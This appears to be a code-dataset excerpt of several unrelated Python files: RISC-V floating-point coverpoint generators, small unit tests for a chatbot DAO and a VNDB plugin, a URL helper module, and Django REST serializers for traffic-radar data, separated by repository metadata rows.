sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent less than -3'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(xlen+1026,2047)
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent greater than (integer width+3)'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
coverpoints = []
k=0
for c in b22_comb:
cvpt = ""
for x in range(1, 2):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += op_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B22 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b23(flen, opcode, ops):
'''
IBM Model B23 Definition:
This model creates boundary cases for the rounding to integers that might cause Overflow.
A test case will be created with inputs equal to the maximum integer number in the destination's format (MaxInt), or close to it. In particular, the following FP numbers will be used:
1. ±MaxInt
2. ±MaxInt ± 0.01 (¼)
3. ±MaxInt ± 0.1 (½)
4. ±MaxInt ± 0.11 (¾)
5. ±MaxInt ± 1
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand 1 = [ MaxInt-4, MaxInt+5 ]
Implementation:
- In the range of (-4,5), the dataset array is appended with the hexadecimal equivalent of maxnum plus the iteration number in a string format. The next highest encoding of the hexadecimal value is calculated.
- This is done with different values of maxnum for flen=32 or flen=64.
- Since this model is meant for floating point conversion instructions, only one operand is expected.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,100,200,800,1600]
dataset = []
if flen == 32:
maxnum = 0x4f000000 # MaxInt (2**31-1) in IEEE 754 Floating Point Representation
for i in range(-4,5):
dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
elif flen == 64:
maxnum = 0x43e0000000000000
for i in range(-4,5):
dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
coverpoints = []
k=0
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.s":
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " "+c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B23 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b24(flen, opcode, ops):
'''
IBM Model B24 Definition:
This model creates boundary cases for rounding to integer that might cause major loss of accuracy.
A test-case will be created for each of the following inputs:
1. ±0
2. ±0 ± 0.01 (¼)
3. ±0 ± 0.1 (½)
4. ±0 ± 0.11 (¾)
5. ±1
6. ±1 + 0.01 (¼)
7. ±1 + 0.1 (½)
8. ±1 + 0.11 (¾)
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand 1 = [±0, ±0 ± 0.01, ±0 ± 0.1, ±0 ± 0.11, ±1, ±1 + 0.01, ±1 + 0.1, ±1 + 0.11]
Implementation:
- A nested loop with 4 stages is initiated to iterate each element in minimums, nums, operations1 and operations2 for the two operands. This is done to form the dataset defined above.
- Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,0.01,0.1,0.11]
minnums = [0,1]
dataset = []
for minnum in minnums:
for num in nums:
for op1 in operations:
for op2 in operations:
dataset.append((eval(op1+str(minnum)+op2+str(num)),op1+str(minnum)+op2+str(num)))
b24_comb = []
for data in dataset:
t = "{:e}".format(data[0])
b24_comb.append((floatingPoint_tohex(flen,float(t)),data[1]))
b24_comb = set(b24_comb)
coverpoints = []
k=0
for c in b24_comb:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.s":
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B24 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b25(flen, opcode, ops, seed=10):
'''
IBM Model B25 Definition:
This model creates a test-case for each of the following inputs:
1. ±MaxInt
2. ±0
3. ±1
4. Random number
:param xlen: Size of the integer registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [±MaxInt, ±0, ±1, Random number]
Implementation:
- The dataset is formed as per the dataset description.
- rand_num is initialized to a random number in the range (1, maxnum).
- Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,0.01,0.1,0.11]
dataset = [(0,"0"),(1,"1"),(-1,"-1")]
if flen == 32:
maxnum = 2**31-1
elif flen == 64:
maxnum = 2**63-1
dataset.append((maxnum,"MaxInt"))
dataset.append((-1*maxnum,"-MaxInt"))
rand_num = int(random.uniform(1,maxnum))
dataset.append((rand_num,"+ve Random Number"))
dataset.append((-1*rand_num,"-ve Random Number"))
b25_comb = []
for data in dataset:
b25_comb.append((int(data[0]),data[1]))
coverpoints = []
k=0
for c in b25_comb:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += "rs1_val == "+str(c[x-1])
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.wu":
cvpt += str(0)
else:
cvpt += str(rm)
cvpt += ' # Number = '
cvpt += c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B25 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b26(xlen, opcode, ops, seed=10):
'''
IBM Model B26 Definition:
This model creates a test-case for each possible value of the number of significant bits in the input operand (which is an integer). A test is created with an example from each of the following
ranges: [0], [1], [2,3], [4,7], [8,15], …, [(MaxInt+1)/2, MaxInt]
:param xlen: Size of the integer registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = Random number in [0], [1], [2,3], [4,7], [8,15], …, [(MaxInt+1)/2, MaxInt]
Implementation:
- A random number is chosen in the ranges defined above.
- Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
dataset = [(0," # Number in [0]"),(1," # Number in [1]")]
i = 3
while(i<=2**(xlen-1)-1):
rand_num = random.randint(int((i+1)/2),i)
dataset.append((rand_num," # Random number chosen in the range: ["+str(int((i+1)/2))+", "+str(i)+"]"))
i = i*2+1
coverpoints = []
k=0
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += "rs1_val == "+str(c[x-1])
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.wu":
cvpt += str(0)
else:
cvpt += str(rm)
cvpt += c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if xlen == 32 else str(64)) + '-bit coverpoints using Model B26 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b27(flen, opcode, ops, seed=10):
'''
IBM Model B27 Definition:
This model tests the conversion of NaNs from a wider format to a narrow one. Each combination from the following table will create one test case (N represents the number of bits in the significand of the destination's format):
[SNaN, QNaN]
==================== ========================================================= =====================
Value of the operand The N-1 MSB bits of the significand (excluding the first) The rest of the bits
==================== ========================================================= =====================
QNaN All 0 All 0
SNan Not all 0 Not all 0
==================== ========================================================= =====================
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [ SNaN, QNaN ]
Implementation:
- Dataset is the combination of snan and qnan values predefined at random initially.
- Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
if flen == 32:
dataset = fsnan + fqnan
elif flen == 64:
dataset = dsnan + dqnan
coverpoints = []
for c in dataset:
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c,str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c) + '(' + str(c) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B27 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b28(flen, opcode, ops, seed=10):
'''
IBM Model B28 Definition:
This model tests the conversion of a floating point number to an integral value, represented in floating-point format. A test case will be created for each of the following inputs:
1. +0
2. A random number in the range (+0, +1)
3. +1
4. Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25)
5. A random number in the range (+1, +1.11..11*2^precision)
6. +1.11..11*2^precision
7. +Infinity
8. NaN
9. -0
10. A random number in the range (-1, -0)
11. -1
12. Every value in the range [-10.11, -1.00)
13. A random number in the range (-1.11..11*2^precision , -1)
14.-1.11..11*2^precision
15. –Infinity
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [ ±0, ±1, ±Infinity, Default NaN, A random number in the range (+0, +1), Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25), A random number in the range (+1, +1.11..11*2^precision), ±1.11..11*2^precision, A random number in the range (-1, -0), Every value in the range [-10.11, -1.00), A random number in the range (-1.11..11*2^precision , -1) ]
Implementation:
- According to the given inputs, all cases are declared and appended to the dataset for flen=32 and flen=64.
- Random numbers are obtained in the respective ranges and for absolute values, it is inherited from the dataset definition.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
dataset = []
if flen == 32:
dataset.append((fzero[0],"+0"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
dataset.append((fone[0],"+1"))
for i in range(125,300,25):
dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(1,2**31-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
dataset.append((floatingPoint_tohex(32,float(2**31-1)),"MaxInt"))
dataset.append((finfinity[0],"+Infinity"))
dataset.append((fsnan[0],"Signaling NaN"))
dataset.append((fqnan[0],"Quiet NaN"))
dataset.append((fzero[1],"-0"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
dataset.append((fone[1],"-1"))
for i in range(-275,-100,25):
dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(-2**31-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
dataset.append((floatingPoint_tohex(32,float(-2**31-1)),"-MaxInt"))
dataset.append((finfinity[1],"-Infinity"))
elif flen == 64:
dataset.append((dzero[0],"+0"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
dataset.append((done[0],"+1"))
for i in range(125,300,25):
dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(1,2**63-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
dataset.append((floatingPoint_tohex(64,float(2**63-1)),"MaxInt"))
dataset.append((dinfinity[0],"+Infinity"))
dataset.append((dsnan[0],"Signaling NaN"))
dataset.append((dqnan[0],"Quiet NaN"))
dataset.append((dzero[1],"-0"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
dataset.append((done[1],"-1"))
for i in range(-275,-100,25):
dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(-2**63-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
dataset.append((floatingPoint_tohex(64,float(-2**63-1)),"-MaxInt"))
dataset.append((dinfinity[1],"-Infinity"))
coverpoints = []
for c in dataset:
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B28 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b29(flen, opcode, ops, seed=10):
'''
IBM Model B29 Definition:
This model checks different cases of rounding of the floating point number. A test will be created for each possible combination of the Sign, LSB, Guard bit and the Sticky bit (16 cases for each operation).
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
Implementation:
- A random mantissa is obtained and is iterated for each sign in each digit in the binary number.
- The exponent is always maintained at -3, in order to facilitate the shift process that occurs during the actual conversion.
- The respective hexadecimal values are appended to the dataset along with the respective Least, Guard and Sticky bit value wherever available.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
sgns = ["0","1"]
dataset = []
if flen == 32:
mant = random.getrandbits(20)
mant = '{:020b}'.format(mant)
for sgn in sgns:
for i in range(8):
LeastGuardSticky = '{:03b}'.format(i)
hexnum = "0x" + hex(int("1"+sgn + "01111100" + mant + LeastGuardSticky,2))[3:]
dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
.format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
elif flen == 64:
mant = random.getrandbits(49)
mant = '{:049b}'.format(mant)
for sgn in sgns:
for i in range(8):
LeastGuardSticky = '{:03b}'.format(i)
hexnum = "0x" + hex(int("1"+sgn + "01111111100" + mant + LeastGuardSticky,2))[3:]
dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
.format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
coverpoints = []
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or "fcvt.d.s" in opcode:
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B29 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
| 5,751 | 0 | 139 |
c0b27db7a8e229092100d40b2d289c9c75ecbf16 | 2,545 | py | Python | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.nosql.mongo.dao.lookup import Lookup
| 45.446429 | 126 | 0.708055 | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.nosql.mongo.dao.lookup import Lookup
class LookupTests(unittest.TestCase):
def test_init_no_id(self):
lookup = Lookup(key='key1', value='value1')
self.assertIsNotNone(lookup)
self.assertIsNone(lookup.id)
self.assertEqual('key1', lookup.key)
self.assertEqual('value1', lookup.value)
self.assertEqual({'key': 'key1', 'value': 'value1'}, lookup.to_document())
def test_init_with_id(self):
lookup = Lookup(key='key1', value='value1')
lookup.id = '666'
self.assertIsNotNone(lookup)
self.assertIsNotNone(lookup.id)
self.assertEqual('666', lookup.id)
self.assertEqual('key1', lookup.key)
self.assertEqual('value1', lookup.value)
self.assertEqual({'_id': '666', 'key': 'key1', 'value': 'value1'}, lookup.to_document())
def test_from_document(self):
lookup1 = Lookup.from_document({'key': 'key1', 'value': 'value1'})
self.assertIsNotNone(lookup1)
self.assertIsNone(lookup1.id)
self.assertEqual('key1', lookup1.key)
self.assertEqual('value1', lookup1.value)
lookup2 = Lookup.from_document({'_id': '666', 'key': 'key1', 'value': 'value1'})
self.assertIsNotNone(lookup2)
self.assertIsNotNone(lookup2.id)
self.assertEqual('666', lookup2.id)
self.assertEqual('key1', lookup2.key)
self.assertEqual('value1', lookup2.value)
| 1,270 | 16 | 104 |
63f183b40929af676339e7b26d3fac102920b43b | 1,650 | py | Python | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | null | null | null | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | 10 | 2016-04-05T04:36:15.000Z | 2018-03-25T00:15:47.000Z | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8
"""Unit tests for the vndb event plugin."""
# pylint: disable=missing-docstring,too-few-public-methods
from twisted.internet.defer import inlineCallbacks
from twisted.trial.unittest import TestCase
from ...message import collapse
from ...test.helpers import CommandTestMixin
from . import Default
| 34.375 | 68 | 0.669091 | # -*- coding: utf-8
"""Unit tests for the vndb event plugin."""
# pylint: disable=missing-docstring,too-few-public-methods
from twisted.internet.defer import inlineCallbacks
from twisted.trial.unittest import TestCase
from ...message import collapse
from ...test.helpers import CommandTestMixin
from . import Default
class VNDBTestCase(CommandTestMixin, TestCase):
command_class = Default
@CommandTestMixin.use_cassette('vndb/no-results')
@inlineCallbacks
def test_no_results(self):
yield self.send_command('slartibartfast')
yield self.assert_no_replies()
@CommandTestMixin.use_cassette('vndb/single-result')
@inlineCallbacks
def test_single_result(self):
yield self.send_command('muv-luv alternative total eclipse')
yield self.assert_reply(collapse(u"""\
https://vndb.org/v7052 —
\x02Muv-Luv Alternative - Total Eclipse\x02
(\x02マブラヴ オルタネイティヴ トータル・イクリプス\x02),
first release 2007-08-31 — rated 7.27 (40)"""))
yield self.assert_no_replies()
@CommandTestMixin.use_cassette('vndb/multiple-results')
@inlineCallbacks
def test_multiple_results(self):
yield self.send_command('ever17')
yield self.assert_reply(collapse(u"""\
https://vndb.org/v17 —
\x02Ever17 -The Out of Infinity-\x02,
first release 2002-08-29 — rated 8.71 (3763)"""))
yield self.assert_reply(collapse(u"""\
https://vndb.org/v3794 —
\x02Ever17 CrossOver Impression\x02,
first release 2005-12-30 — rated 6.20 (3)"""))
yield self.assert_no_replies()
| 992 | 369 | 23 |
1a387f0a7ab6513e1c619e55b24ae2df58847192 | 1,225 | py | Python | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | 1 | 2017-12-21T18:16:20.000Z | 2017-12-21T18:16:20.000Z | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | null | null | null | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | null | null | null | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
from urllib import urlencode
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlsplit, urlunsplit
__author__ = 'Tyler Butler <tyler@tylerbutler.com>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
| 29.166667 | 105 | 0.689796 | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
from urllib import urlencode
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlsplit, urlunsplit
__author__ = 'Tyler Butler <tyler@tylerbutler.com>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
def remove_query_parameters(url, params=None, case_sensitive=False):
def is_in(to_check, iterable, cs):
if cs:
return to_check in iterable
else:
return to_check.upper().lower() in iterable
pieces = list(urlsplit(url))
if params is None:
pieces[3] = ''
else:
if not case_sensitive:
params[:] = [p.upper().lower() for p in params]
query = parse_qsl(pieces[3])
query[:] = [(param, value) for param, value in query if not is_in(param, params, case_sensitive)]
pieces[3] = urlencode(query, doseq=True)
return urlunsplit(pieces)
def urljoin(url1, *url2):
# This method is necessary because sometimes urlparse.urljoin simply doesn't work correctly
# when joining URL fragments.
return posixpath.join(url1, *url2)
| 787 | 0 | 46 |
34e31fa7eb54e39276821d4e196a0a84d638c343 | 1,804 | py | Python | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | null | null | null | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | 10 | 2020-02-12T03:19:25.000Z | 2021-12-13T20:26:40.000Z | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from radar.models import BaseRadares, Contagens, Viagens, Trajetos
from rest_framework_cache.serializers import CachedSerializerMixin
from rest_framework_cache.registry import cache_registry
cache_registry.register(BaseRadaresSerializer)
cache_registry.register(ContagensSerializer)
| 24.053333 | 80 | 0.538803 | from rest_framework import serializers
from radar.models import BaseRadares, Contagens, Viagens, Trajetos
from rest_framework_cache.serializers import CachedSerializerMixin
from rest_framework_cache.registry import cache_registry
class BaseRadaresSerializer(CachedSerializerMixin, serializers.ModelSerializer):
class Meta:
model = BaseRadares
fields = [
'id',
'lote',
'codigo',
'endereco',
'sentido',
'referencia',
'tipo_equip',
'enquadrame',
'qtde_fxs_f',
'data_publi',
'velocidade',
'latitude_l',
'latitude',
'longitude',
'ligado',
'data_desli',
'motivo_des',
'mi_style',
'mi_prinx',
'geom',
'emme_gid',
'mdc_gid',
]
cache_registry.register(BaseRadaresSerializer)
class ContagensSerializer(CachedSerializerMixin, serializers.ModelSerializer):
# acuracia = serializers.Ser
class Meta:
model = Contagens
fields = [
'data_e_hora',
'localidade',
'tipo',
'contagem',
'autuacoes',
'placas',
'acuracia',
'autuacoes_por_placas'
]
cache_registry.register(ContagensSerializer)
class ViagensSerializer(serializers.ModelSerializer):
class Meta:
model = Viagens
fields = [
'id',
'data_inicio',
'data_final',
'inicio',
'final',
'tipo',
'distancia'
]
class TrajetosSerializer(serializers.ModelSerializer):
class Meta:
model = Trajetos
